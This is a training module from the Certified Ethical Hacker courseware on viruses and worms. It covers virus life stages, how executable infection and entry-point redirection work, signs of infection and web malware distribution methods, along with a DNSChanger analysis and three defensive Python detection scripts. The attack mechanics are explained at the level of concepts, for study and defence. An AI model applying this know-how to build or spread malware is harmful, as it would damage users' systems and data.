Ethical Hacking and Countermeasures v8
Module 07: Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Engineered by Hackers. Presented by Professionals.
Module 07 Page 1007
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

Global Cyber-Warfare Tactics: New Flame-linked Malware used in "Cyber-Espionage"
GlobalResearch, October 19, 2012
Source: http://www.globalresearch.ca

A new cyber espionage program linked to the notorious Flame and Gauss malware has been detected by Russia's Kaspersky Lab. The antivirus giant's chief warns that global cyber warfare is in "full swing" and will probably escalate in 2013.

The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website.

The malware was originally identified as an appendage of Flame, the program used for targeted cyber espionage in the Middle East and acknowledged to be part of joint US-Israeli efforts to undermine Iran's nuclear program.
But later, Kaspersky Lab analysts discovered that miniFlame is an "interoperable tool that could be used as an independent malicious program, or concurrently as a plug-in for both the Flame and Gauss malware."

The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations.

"MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss. Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said.

High-precision attack tool

So far just 50 to 60 cases of infection have been detected worldwide, according to Kaspersky Lab. But unlike Flame and Gauss, miniFlame is meant for installation on machines already infected by those viruses.

"MiniFlame is a high-precision attack tool. Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyber attack," Kaspersky's Chief Security Expert Alexander Gostev explained. "First, Flame or Gauss are used to infect as many victims as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage."

The newly-discovered malware can also take screenshots of an infected computer while it is running a specific program or application such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client.

Kaspersky Lab believes miniFlame's developers have probably created dozens of different modifications of the program. "At this time, we have only found six of these, dated 2010-2011," the firm said.

'Cyber warfare in full swing'

Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports.

Speaking at an International Telecommunication Union Telecom World conference in Dubai, the antivirus tycoon said, "cyber warfare is in full swing and we expect it to escalate in 2013."

"The latest malicious virus attack on the world's largest oil and gas company, Saudi Aramco, last August shows how dependent we are today on the Internet and information technology in general, and how vulnerable we are," Kaspersky said.

He stopped short of blaming any particular player behind the massive cyber-attacks across the Middle East, pointing out that "our job is not to identify hackers or cyber-terrorists. Our firm is like an X-ray machine, meaning we can scan and identify a problem, but we cannot say who or what is behind it."

Iran, which confirmed that it suffered an attack by Flame malware that caused severe data loss, blames the United States and Israel for unleashing the cyber-attacks.

Copyright © 2005-2012 GlobalResearch.ca. By Russia Today.
http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867
Module Objectives

- Introduction to Viruses
- Stages of Virus Life
- Working of Viruses
- Indications of Virus Attack
- How Does a Computer Get Infected by Viruses?
- Virus Analysis
- Types of Viruses
- Virus Maker
- Computer Worms
- Worm Analysis
- Worm Maker
- Malware Analysis Procedure
- Online Malware Analysis Services
- Virus and Worms Countermeasures
- Antivirus Tools
- Penetration Testing for Virus
This module introduces the viruses and worms in circulation today: how a computer virus works, how viruses are classified, how they affect systems, and the indications that a system is under attack. It also covers the countermeasures available against virus and worm infections and how to test a system or network for their presence.
Module Flow

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing
This section introduces the viruses and worms seen today, gives a brief overview of each, and presents statistics on viruses and worms in recent years. It lists the various types of viruses and their effects on a system, discusses in detail how a virus works in each phase of its life, and highlights the techniques attackers use to distribute malware on the web.
Introduction to Viruses

- A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document.
- Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments.

Virus Characteristics

- Infects other programs
- Alters data
- Corrupts files and programs
- Transforms itself
- Encrypts itself
- Self propagates
Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that reproduces by inserting copies of its own code into other executable code. It operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, a virus can reach other machines only with the assistance of computer users, for example when an infected file is copied, emailed or downloaded. Some viruses act as soon as their code is executed; others lie dormant until a predetermined logical condition is met. Malicious programs fall into three categories:

- Trojans and rootkits
- Viruses
- Worms

A worm is a malicious program that can infect both local and remote machines. Worms spread automatically by infecting system after system in a network, and even spread further to other networks. Worms therefore have a greater potential for causing damage, because they do not rely on the user's actions for execution. There are also malicious programs in the wild that combine the features of all three categories.
Virus and Worm Statistics

[Chart: number of malware samples per year, 2008 to 2012, y-axis 0 to 75,000,000. Source: http://www.av-test.org]
Source: http://www.av-test.org

This graph gives a picture of the malware volume observed in recent years. According to the graph, about 11,666,667 viruses and worms had been catalogued in 2008, whereas by 2012 the count had risen to roughly 70,000,000, which means the volume of malware is growing rapidly year by year. Note that the AV-TEST figure counts distinct malware samples, not infected systems.
FIGURE 7.1: Virus and Worm Statistics (chart of malware counts per year, 2008 to 2012)
Stages of Virus Life
A computer virus passes through several stages, from design to elimination:
1. Design: Virus code is developed using a programming language or a construction kit. Anyone with basic programming knowledge can create a virus.
2. Replication: The virus first replicates itself within the target system over a period of time.
3. Launch: The virus is activated when a user performs a certain action, such as running an infected program.
4. Detection: The virus is identified as a threat infecting target systems, typically after its actions have caused considerable damage to the target system's data.
5. Incorporation: Antivirus software developers assemble defenses against the virus.
6. Elimination: Users install the antivirus updates and eliminate the virus, and awareness spreads among user groups.
Working of Viruses: Infection Phase

- In the infection phase, the virus replicates itself and attaches to an .exe file in the system.

(Figure 7.2 shows a clean file before infection and the virus-infected file after.)
Viruses attack a target host's system using various methods. They attach themselves to programs and transmit themselves to other programs by making use of certain events. Viruses need such events to take place, since they cannot:

- Start by themselves
- Infect other hardware
- Cause physical damage to a computer
- Transmit themselves using non-executable files (note that documents carrying macros or scripts count as executable content, which is why Office documents can carry viruses)

Generally viruses have two phases, the infection phase and the attack phase. In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection enable the virus's functionality to run on that system: the virus is activated as soon as the infected program is executed, since the program's code leads to the virus code. Virus writers have to balance factors such as:

- How will the virus infect?
- How will it spread?
- How will it reside in a target computer's memory without being detected?
Obviously, viruses have to be triggered and executed in order to function, and there are many ways to execute programs while a computer is running. For example, a setup program calls numerous other programs, some built into the system and some shipped on the distribution medium. If a virus is already present, it can be activated by this kind of execution and infect the setup program as well. Some viruses infect and keep spreading every time they are executed; others do not infect programs when first executed but stay resident in the computer's memory and infect programs later. Such terminate-and-stay-resident (TSR) viruses wait for a specified trigger event before spreading, which makes it difficult to tell which event will trigger a dormant infection.

Refer to the figure that follows to see how .EXE file infection works. The .EXE file's header tells the loader where execution begins. Once the file is infected, that entry point leads to the virus code, so the virus runs first each time the application is launched and then passes control to the original program.

- A file virus infects by attaching itself to an executable system or application program. Text files such as source code, batch files, script files, etc., are also potential targets for virus infections.
- Boot sector viruses execute their own code first, before the target PC's operating system is booted.
FIGURE 7.2: Working of Viruses in Infection Phase (before infection: clean .exe file; after infection: virus code attached to the .exe file)
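The entry-point redirection described above leaves a measurable trace in the PE header, which is the first thing an analyst checks on a suspected infected executable. The following Python script is an added example, not code from the courseware: using only the standard library it parses the PE file header, optional header and section table, locates the section that contains AddressOfEntryPoint, and flags an entry point that lies in the last section, in a writable and executable section, or outside the first executable section, all typical of an appending file infector. The build_pe helper, the section names and the two layouts are constructed test input, not real samples.

```python
"""Entry-point sanity check for PE files (added example, standard library only).

An appending file infector typically adds a section (or grows the last one),
writes its body there and points AddressOfEntryPoint at it. A compiler-built
binary keeps its entry point inside the first executable section, usually
.text, so the location of the entry point is a cheap triage signal.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes):
    """Return (entry_rva, sections); sections is a list of
    (name, virtual_address, virtual_size, characteristics) tuples."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_hdr = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", data, file_hdr + 16)[0]
    opt_hdr = file_hdr + 20                      # IMAGE_OPTIONAL_HEADER
    # AddressOfEntryPoint sits at offset 16 in both PE32 and PE32+ headers
    entry_rva = struct.unpack_from("<I", data, opt_hdr + 16)[0]
    sections = []
    table = opt_hdr + opt_size                   # IMAGE_SECTION_HEADER array, 40 bytes each
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", data, off + 8)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, vaddr, vsize, characteristics))
    return entry_rva, sections


def entry_point_findings(data: bytes) -> list:
    """Return human-readable warnings; an empty list means the entry point
    looks like that of an ordinary compiler-produced binary."""
    entry_rva, sections = parse_pe(data)
    home = None
    for idx, (_, vaddr, vsize, _) in enumerate(sections):
        if vaddr <= entry_rva < vaddr + max(vsize, 1):
            home = idx
            break
    if home is None:
        return ["entry point 0x%x lies outside every section" % entry_rva]
    name, _, _, flags = sections[home]
    findings = []
    if not flags & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry point in non-executable section %s" % name)
    elif flags & IMAGE_SCN_MEM_WRITE:
        findings.append("entry point in writable and executable section %s" % name)
    if len(sections) > 1 and home == len(sections) - 1:
        findings.append("entry point in last section %s" % name)
    first_exec = next((i for i, s in enumerate(sections) if s[3] & IMAGE_SCN_MEM_EXECUTE), None)
    if first_exec is not None and home != first_exec:
        findings.append("entry point not in first executable section %s" % sections[first_exec][0])
    return findings


def build_pe(sections, entry_rva: int) -> bytes:
    """Construct a minimal PE32 image (headers only, not loadable) with the
    given section table. Used here only to produce constructed test input."""
    e_lfanew = 0x40
    dos_hdr = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0xE0, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    # Magic=PE32, linker versions, SizeOfCode, SizeOfInitializedData,
    # SizeOfUninitializedData, AddressOfEntryPoint; remainder zero-padded
    opt_hdr = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(0xE0, b"\0")
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, flags)
        for name, vaddr, vsize, flags in sections
    )
    return dos_hdr + b"PE\0\0" + file_hdr + opt_hdr + table


# Constructed section layouts: a normal two-section binary, and the same
# binary after an infector appended a writable+executable ".virus" section
# and moved the entry point into it.
CLEAN_LAYOUT = [(".text", 0x1000, 0x2000, 0x60000020), (".data", 0x3000, 0x1000, 0xC0000040)]
INFECTED_LAYOUT = CLEAN_LAYOUT + [(".virus", 0x4000, 0x800, 0xE0000020)]

if __name__ == "__main__":
    print("clean   :", entry_point_findings(build_pe(CLEAN_LAYOUT, 0x1200)))
    print("infected:", entry_point_findings(build_pe(INFECTED_LAYOUT, 0x4010)))
```

A compiler-produced binary normally returns an empty list. Legitimate packers and protectors (UPX and similar) also relocate the entry point, so treat a hit as a triage signal that justifies a closer look, not as proof of infection.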
Working of Viruses: Attack Phase

- Viruses are programmed with trigger events to activate and corrupt systems.
- Some viruses infect each time they are run and others infect only when a certain predefined condition is met, such as a user's specific task, a day, time, or a particular event.

(Figure 7.3 contrasts files A and B stored contiguously before the attack with the same files fragmented after the attack.)
Once viruses have spread throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that must occur before they corrupt the host system. Some viruses carry bugs of their own and, after replicating, perform activities such as deleting files and increasing session time. They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:

- Deleting files and altering content in data files, thereby causing the system to slow down
- Performing tasks not related to applications, such as playing music and creating animations
FIGURE 7.3: Working of Viruses in Attack Phase (top: unfragmented files A and B, each with pages 1 to 3 stored in order; bottom: the pages of A and B interleaved and out of order after the virus attack)
Refer to this figure, which shows two files, A and B. In the first section, the two files are located one after the other in an orderly fashion. Once a virus infects the files, it alters the positioning of the files that were consecutively placed, leading to inaccurate file allocation and causing the system to slow down as users try to retrieve their files. In this phase:

- Viruses execute when some events are triggered
- Some execute and corrupt via built-in bug programs after being stored in the host's memory
- Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent
Why Do People Create Computer Viruses?

- Inflict damage to competitors
- Financial benefits
- Research projects
- Play prank
- Vandalism
- Cyber terrorism
- Distribute political messages
Source: http://www.securitydocs.com

Computer viruses are not self-generated; they are created by cyber-criminal minds and intentionally designed to cause destructive events in a system. Generally, viruses are created with a disreputable motive: cyber-criminals create viruses to destroy a company's data, as an act of vandalism or a prank, or to sabotage a company's products. In some cases, however, a virus is claimed to be intended to benefit a system, for instance by deleting other viruses previously embedded in files; even such "good" viruses modify systems without the owner's consent. Some reasons viruses have been written include:

- Inflict damage to competitors
- Research projects
- Pranks
- Vandalism
- Attack the products of specific companies
- Distribute political messages
- Financial gain
- Identity theft
- Spyware
- Cryptoviral extortion
Indications of Virus Attacks

- Processes take more resources and time
- Computer slows down when programs start
- Computer freezes frequently or encounters errors
An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, infect the machines of the users who receive them. A virus can also make good use of file servers to infect files. The following are indications of a virus attack on a computer system:

- Programs take longer to load
- The hard drive is always full, even without installing any programs
- The floppy disk drive or hard drive runs when it is not being used
- Unknown files keep appearing on the system
- The keyboard or the computer emits strange or beeping sounds
- The computer monitor displays strange graphics
- File names turn strange, often beyond recognition
- The hard drive becomes inaccessible when trying to boot from the floppy drive
- A program's size keeps changing
- The memory on the system seems to be in use and the system slows down
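Several of these indications (a program's size changing, unknown files appearing, the disk filling up) are detectable deterministically rather than by impression: compare the current state of a program directory against a baseline of file sizes and hashes. The Python below is an added example, not part of the courseware. It records a SHA-256 digest and size for every file under a directory, then reports files added, removed or modified since the baseline. The demo() function uses a temporary directory and constructed contents (an "app.exe" that grows by 512 bytes, as an appending infector would cause, and a dropped "svchost.exe") to stand in for an infection; the file names are hypothetical.

```python
"""Baseline-and-compare file integrity check (added example).

snapshot() hashes every regular file under a directory; compare() diffs two
snapshots. Sizes are kept alongside the digests because "a program's size
keeps changing" is itself one of the indications listed above.
"""
import hashlib
import tempfile
from pathlib import Path


def snapshot(root: str) -> dict:
    """Map relative POSIX path -> (size_in_bytes, sha256_hex) for every
    regular file under root, walking subdirectories too."""
    result = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        digest = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):   # stream, do not slurp
                digest.update(chunk)
        rel = path.relative_to(root).as_posix()
        result[rel] = (path.stat().st_size, digest.hexdigest())
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Return {'added': [...], 'removed': [...], 'modified': [...]} relative
    to the baseline. A file counts as modified if its size or digest changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: take a baseline of a small 'program folder',
    then simulate an appending infector and a dropped file, and diff."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "app.exe").write_bytes(b"MZ" + b"\x90" * 4096)   # constructed stand-in binary
        Path(root, "readme.txt").write_text("legitimate text file\n")
        baseline = snapshot(root)

        # Simulated infection: app.exe grows by 512 bytes, a new file appears.
        with Path(root, "app.exe").open("ab") as fh:
            fh.write(b"\xcc" * 512)
        Path(root, "svchost.exe").write_bytes(b"MZ" + b"\x00" * 64)  # hypothetical dropped file

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print("%-8s %s" % (kind, ", ".join(paths) or "-"))
```

Take the baseline from a known-clean state and store it where the host cannot rewrite it (read-only media or a separate machine); a baseline taken after infection only proves that the infection is stable. The same routine, run against an installer just downloaded, also replaces "checking the source" with something verifiable: compare the digest it computes against the one the vendor publishes.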
How Does a Computer Get Infected by Viruses?

- When a user accepts files and downloads without properly checking the source
- Opening infected e-mail attachments
- Installing pirated software
- Not updating and not installing new versions of plug-ins
- Not running the latest anti-virus application
There are many ways in which a computer gets infected by viruses. The most common are as follows:

- A user accepts files and downloads without properly checking the source.
- Attackers send virus-infected files as email attachments to spread the virus to the victim's system. If the victim opens the attachment, the virus infects the system.
- Attackers embed viruses in popular software programs and upload the infected software to download sites. When the victim downloads and installs the infected software, the system gets infected.
- Failing to install new versions or the latest patches, intended to fix known bugs, may expose a system to viruses.
- Attackers keep designing new viruses as technology advances. Failing to run an up-to-date antivirus application may expose a system to virus attacks.
Module 07 Page 1025
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
Common Techniques Used to Distribute Malware on the Web
- Blackhat Search Engine Optimization (SEO): Ranking malware pages highly in search results
- Malvertising: Embedding malware in ad networks that display across hundreds of legitimate, high-traffic sites
- Social Engineered Click-jacking: Tricking users into clicking on innocent-looking web pages
- Compromised Legitimate Websites: Hosting embedded malware that spreads to unsuspecting visitors
- Spearphishing Sites: Mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials
- Drive-by Downloads: Exploiting flaws in browser software to install malware just by visiting a web page
Source: Security Threat Report 2012 (http://www.sophos.com)
Common Techniques Used to Distribute Malware on the Web
Source: Security Threat Report 2012 (http://www.sophos.com)
Blackhat Search Engine Optimization (SEO): Using this technique, the attacker ranks malware pages high in search results.
Social Engineered Click-jacking: The attackers trick users into clicking on innocent-looking web pages that contain malware.
Spearphishing Sites: This technique is used for mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials.
Malvertising: Embeds malware in ad networks that display across hundreds of legitimate, high-traffic sites.
Compromised Legitimate Websites: Host embedded malware that spreads to unsuspecting visitors.
Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by visiting a web page.
Virus Hoaxes and Fake Antiviruses
Virus Hoaxes
- Hoaxes are false alarms claiming reports about a non-existing virus, which may contain virus attachments
- Warning messages propagating that a certain email message should not be viewed, and that doing so will damage one's system
Fake Antiviruses
- Attackers disguise malware as an antivirus and trick users into installing it on their systems
- Once installed, these fake antiviruses can damage target systems similar to other malware
Virus Hoaxes and Fake Antiviruses
Virus Hoaxes
A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals send to create havoc. It is fairly common for innocent users to pass these phony messages along thinking they are helping others avoid the "virus."
- Hoaxes are false alarms claiming reports about non-existing viruses
- These warning messages, which can be propagated rapidly, state that a certain email message should not be opened, and that doing so would damage one's system
- In some cases, these warning messages themselves contain virus attachments
- These possess the capability of vast destruction on target systems
Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how one would become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.
Try to cross-check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:
- If it is posted by newsgroups that are suspicious, cross-check the information with another source
- If the person who has posted the news is not a known person in the community or an expert, cross-check the information with another source
- If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation
- One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites
- If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information

Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS
PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS E-MAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US. End-of-mail. Thanks.
FIGURE 7.3: Hoaxes Warning Message
Fake Antiviruses
A fake antivirus is a method hackers use to affect a system; it can poison your system and break the registry and system files to allow the attacker to take full control of and access to your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear in different browsers and warn users that they have various security threats on their system, and this message is backed up by real suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to payment details. These fake antivirus programs have been fabricated in such a way that they draw the attention of the unsuspecting user into installing the software. Some of the methods used to extend the usage and installation of fake antivirus programs include:
- Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prompt the user to open the attachments for software installation.
- Search engine optimization: Attackers generate pages related to public or current search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
- Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.
FIGURE 7.4: Example of a Fake Antivirus
Virus Analysis: DNSChanger
DNSChanger (Alureon) modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information
- It acts as a bot and can be organized into a BotNet and controlled from a remote location
- It spreads through emails, social engineering tricks, and untrusted downloads from the Internet
- DNSChanger malware achieves the DNS redirection by modifying the following registry key setting against an interface device such as a network card: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID%\NameServer
- DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the BotNet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names
http://www.totaldefense.com
Virus Analysis: DNSChanger
Source: http://www.totaldefense.com
DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and controlled from a remote location. This malware achieves DNS redirection by modifying the system registry key settings against an interface device such as a network card. DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the botnet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. It can also modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.
Virus Analysis: DNSChanger (Cont'd)
The rogue DNS servers can exist in any of the following ranges:
64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
http://www.totaldefense.com
Virus Analysis: DNSChanger (Cont'd)
Source: http://www.totaldefense.com
The rogue DNS servers can exist in any of the following ranges:
64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
(Diagram labels: "Attacker runs DNS Server in Russia (IP: 64.28.176.2)"; "DNSChanger infects victim's computer by changing her DNS IP address to 64.28.176.2"; "DNS Request: What is the IP address of www.xsecurity.com?" sent to 64.28.176.2; "Fake Website IP: 65.0.0.2"; "DNSChanger sniffs the credential and redirects the request to real website"; "Real Website www.xsecurity.com IP: 200.0.0.45")
FIGURE 7.5: Virus Analysis Using DNSChanger
To infect the system and steal credentials, the attacker has to first run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to 64.28.176.2. When this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After altering the DNS setting, any request that is made by the system is sent to the malicious DNS server. Here, the victim sent the DNS request "What is the IP address of www.xsecurity.com?" to 64.28.176.2. The attacker responded to the request with a record stating that www.xsecurity.com is located at 65.0.0.2. When the victim's browser connects to 65.0.0.2, it is directed to a fake website created by the attacker with IP 65.0.0.2. DNSChanger sniffs the credentials (user name, passwords) and redirects the request to the real website (www.xsecurity.com) with IP 200.0.0.45.
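A defender's check for the setting and the ranges described in the DNSChanger slides, as an added example that is not code from this module or from Total Defense: it reads each interface's NameServer value under the Tcpip\Parameters\Interfaces key named above and flags any resolver that falls inside the listed rogue ranges. The interface GUIDs and NameServer strings in SAMPLE_INTERFACES are constructed; the registry reader only works on Windows and the script falls back to the sample elsewhere.

```python
"""Check per-interface DNS server settings against the rogue DNSChanger
server ranges listed in this module.  Added example; not code from the
module or from Total Defense.  The registry path is the one the module
names; SAMPLE_INTERFACES is constructed data so the check runs offline."""
import ipaddress

# Rogue DNSChanger server ranges exactly as listed in the module.
ROGUE_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Convert each first-last pair into CIDR networks so membership tests are cheap.
ROGUE_NETWORKS = [
    net
    for first, last in ROGUE_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
]

# Registry key named in the module (under HKEY_LOCAL_MACHINE); each subkey is
# one interface GUID, and its NameServer value holds the static DNS servers.
INTERFACES_KEY = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"


def is_rogue_dns(address):
    """Return True if the address lies inside one of the listed rogue ranges.
    Strings that are not IP addresses are reported as not rogue."""
    try:
        ip = ipaddress.ip_address(address.strip())
    except ValueError:
        return False
    return any(ip in net for net in ROGUE_NETWORKS)


def parse_nameserver_value(value):
    """NameServer is a REG_SZ; Windows separates several resolvers with
    commas or spaces.  Return the individual address strings."""
    return value.replace(",", " ").split()


def check_interfaces(interfaces):
    """interfaces: mapping interface GUID -> NameServer string.
    Return (guid, address) pairs whose resolver is in a rogue range."""
    hits = []
    for guid, value in interfaces.items():
        for address in parse_nameserver_value(value or ""):
            if is_rogue_dns(address):
                hits.append((guid, address))
    return hits


def read_interfaces_from_registry():
    """Read every interface's NameServer value from the live registry.
    Works only on Windows (winreg); returns an empty dict elsewhere."""
    try:
        import winreg
    except ImportError:
        return {}
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, INTERFACES_KEY) as root:
        index = 0
        while True:
            try:
                guid = winreg.EnumKey(root, index)
            except OSError:          # no more subkeys
                break
            index += 1
            with winreg.OpenKey(root, guid) as sub:
                try:
                    value, _ = winreg.QueryValueEx(sub, "NameServer")
                except OSError:      # value not set on this interface
                    value = ""
            result[guid] = value
    return result


# Constructed sample: one interface still pointing at the rogue server used
# in the module's diagram (64.28.176.2), one at an ordinary LAN resolver.
SAMPLE_INTERFACES = {
    "{11111111-2222-3333-4444-555555555555}": "64.28.176.2,64.28.176.3",
    "{66666666-7777-8888-9999-000000000000}": "192.168.1.1",
}

if __name__ == "__main__":
    data = read_interfaces_from_registry() or SAMPLE_INTERFACES
    for guid, address in check_interfaces(data):
        print(f"interface {guid}: NameServer {address} is in a DNSChanger range")
```

DHCP-assigned resolvers live in the DhcpNameServer value of the same subkeys, so a static NameServer entry that points into these ranges on a machine that normally uses DHCP is itself a strong indicator.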
Module Flow
Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

Module Flow
So far, we have discussed viruses and worms. Now we will discuss the different types of viruses.
This section describes the different types of viruses.
Types of Viruses
System or Boot Sector Viruses
Stealth Virus/Tunneling Virus
Encryption
Polymorphic
Metamorphic
Sparse Infector Virus
Cluster Viruses
Direct Action or Transient
Multipartite

Types of Viruses
So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses. This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on. Computer viruses are malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.

Types of Viruses
Viruses are classified depending on two categories:
- What Do They Infect?
- How Do They Infect?
What Do They Infect?
System or Boot Sector Viruses
